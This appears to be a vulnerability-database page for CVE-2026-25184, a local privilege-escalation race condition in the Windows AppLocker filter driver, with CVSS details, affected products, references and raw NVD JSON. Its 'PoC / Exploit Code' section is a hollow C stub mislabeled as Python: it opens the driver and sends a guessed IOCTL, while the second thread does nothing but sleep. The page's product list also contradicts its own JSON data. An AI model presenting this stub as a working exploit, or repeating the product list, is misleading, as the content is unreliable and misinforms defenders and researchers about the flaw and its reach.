CVE-2026-25184

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in Applocker Filter Driver (applockerfltr.sys) allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score

7.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:* - VULNERABLE

Windows 10 (Specific versions)

Windows 11 (Specific versions)

Windows Server 2019/2022

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <windows.h>
#include <stdio.h>

// Conceptual PoC for Race Condition in Kernel Driver
HANDLE hDevice;

DWORD WINAPI Thread1(LPVOID lpParam) {
    // Trigger the vulnerable operation in the driver
    DWORD bytesReturned;
    DeviceIoControl(hDevice, 0x222003, NULL, 0, NULL, 0, &bytesReturned, NULL);
    return 0;
}

DWORD WINAPI Thread2(LPVOID lpParam) {
    // Modify the shared resource during the race window
    // This might involve freeing an object or changing a pointer
    while (TRUE) {
        // Simulate modification
        Sleep(1); 
    }
    return 0;
}

int main() {
    // Open handle to the vulnerable driver
    hDevice = CreateFileA("\\\\.\\ApplockerFltr", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device.\n");
        return 1;
    }

    // Create threads to exploit race condition
    HANDLE hThreads[2];
    hThreads[0] = CreateThread(NULL, 0, Thread1, NULL, 0, NULL);
    hThreads[1] = CreateThread(NULL, 0, Thread2, NULL, 0, NULL);

    WaitForMultipleObjects(2, hThreads, TRUE, INFINITE);
    
    CloseHandle(hDevice);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-25184
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-25184
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-25184/
[4] VulDB https://vuldb.com/cve/CVE-2026-25184
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-25184

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-25184", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:16:45.390", "lastModified": "2026-04-24T20:08:12.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Concurrent execution using shared resource with improper synchronization ('race condition') in Applocker Filter Driver (applockerfltr.sys) allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "B33CE091-B873-4C30-BA05-54A8C1839212"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "E3AF28F3-D486-4B88-9E0E-371241024174"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "94EB36C7-1FF2-4B44-AD91-F3540F09393E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "14B23C3F-C8AC-491A-BCA5-EB6982C8F9E9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "361B5DAB-8D1F-45D7-A33C-F49EBA56B5F8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "ADC6CE99-AB5D-4DD5-82A9-892366C4B2FD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "690E74A8-E72C-47B6-96EB-37C48D69A635"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "13A01FA1-08DC-4E33-9FFC-AB4BCD9634CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2274", "matchCriteriaId": "55A1F3AB-5299-4495-9A73-FDA23C6FD88D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.32690", "matchCriteriaId": "ADF41A14-B9DA-4788-82A8-74DCDCD090E1"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-25184", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}